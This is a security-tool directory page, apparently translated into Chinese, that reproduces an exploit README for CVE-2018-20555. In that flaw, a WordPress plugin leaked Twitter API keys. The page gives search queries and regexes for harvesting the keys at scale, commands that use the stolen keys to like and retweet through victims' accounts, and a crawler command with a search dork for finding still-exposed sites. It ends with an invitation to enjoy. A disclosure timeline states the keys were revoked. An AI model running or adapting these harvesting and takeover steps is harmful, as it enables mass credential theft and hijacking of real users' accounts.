Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2018-20555 — CVE-2018-20555 漏洞利用工具:通过易受攻击的 Social Network Tabs WordPress 插件中泄露的 API 密钥,自动发现并接管 Twitter 账户,具备抓取和大规模利用能力。 | Kitploit
工具/GitHubGitHub/fs0c131y/cve-2018-20555
OSINT (开源情报)漏洞分析漏洞利用Web应用程序漏洞利用信息收集网络爬虫
GitHubfs0c131y/cve-2018-20555

CVE-2018-20555

CVE-2018-20555 漏洞利用工具:通过易受攻击的 Social Network Tabs WordPress 插件中泄露的 API 密钥,自动发现并接管 Twitter 账户,具备抓取和大规模利用能力。

查看仓库
711827年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
网站

CVE-2018-20555

由 Design Chemical 公司开发的 WordPress 插件 Social Network Tabs 两次泄露了其用户的 Twitter access_token、access_token_secret、consumer_key 和 consumer_secret,导致其 Twitter 账户被接管。

问题出在显示 Twitter 微件的页面中的以下代码行:

root@kitploit:~
jQuery(document).ready(function ($) {
	var config = {
		widgets: "twitter,facebook,youtube",
		twitterId: "[已编辑]",
		facebookId: "[已编辑]",
		youtubeId: "[已编辑]",
		twitter: {
			url: "https://www.rainx.com/wp-content/plugins/social-network-tabs/inc/dcwp_twitter.php?1=%5B已编辑%5D&2=%5B已编辑%5D&3=%5B已编辑%5D&4=%5B已编辑%5D …",
			title: "最新推文",
			follow: "关注",
			followId: "",
			limit: "10",
			retweets: true,
			replies: true,
			images: "thumb",
			consumer_key: "[已编辑]",
			consumer_secret: "[已编辑]",
			access_token: "[已编辑]",
			access_token_secret: "[已编辑]"
		},
	}
});

利用方法

借助 Publicwww,通过以下搜索查询,我从 539 个易受攻击的网站中检索到了 Twitter access_token、access_token_secret、consumer_key 和 consumer_secret:

  • dcwp_twitter.php access_token_secret snipexp:|access_token: "([\w\d-._]+)"|
  • dcwp_twitter.php access_token_secret snipexp:|access_token_secret: "([\w\d-._]+)"|
  • dcwp_twitter.php access_token_secret snipexp:|consumer_key: "([\w\d-._]+)"|
  • dcwp_twitter.php access_token_secret snipexp:|consumer_secret: "([\w\d-._]+)"|

所有密钥均可在 twitter_keys.csv 中找到。

操作方法

测试 twitter_keys.csv 中的 Twitter API 密钥

root@kitploit:~
python test_twitter_api_keys.py -t

我第一次运行此命令时,获得了 446 个 Twitter 账户的信息。值得一提的是,列表中有 2 个已验证账户,以及多个粉丝数超过 10K+ 的账户。所有易受攻击的账户都列在 vulnerable_accounts.txt 中。

有趣的部分

为你选择的推文点赞

root@kitploit:~
python test_twitter_api_keys.py -l [tweet_id]

转发你选择的推文

root@kitploit:~
python test_twitter_api_keys.py -r [tweet_id]

我第一次运行此命令时,成功为自己选择的推文点赞了 127 次,这表明有 127 个 Twitter API 密钥拥有读写权限,即我可以接管 127 个 Twitter 账户(更改头像、点赞、转发、修改简介等),原因正是这些密钥泄露。

更新于 18/01/17

大量网站及其 Twitter 账户仍然受到此问题的影响。为了识别它们,我创建了一个爬虫:

root@kitploit:~
cd TwitterApiKeysSearchEngine/

scrapy crawl TwitterApiKeysSpider -a keyword="inurl:/inc/dcwp_twitter.php?1=" -a se=google -a pages=10

此 Google 搜索查询的结果总数为 3550。在前 9 页中,我成功检索到了 78 个密钥(86%)。尽情享受吧!

披露时间线

  • 18/12/01:向 Twitter 披露
  • 18/12/0X:Twitter 停用了所有密钥
  • 18/12/11:Twitter 确认为有效安全问题

联系方式

在 Twitter 上关注我!你也可以在 https://fs0c131y.com 上找到我工作的一小部分。

致谢

此项调查及 PoC 由 @fs0c131y 用❤️完成。

下载工具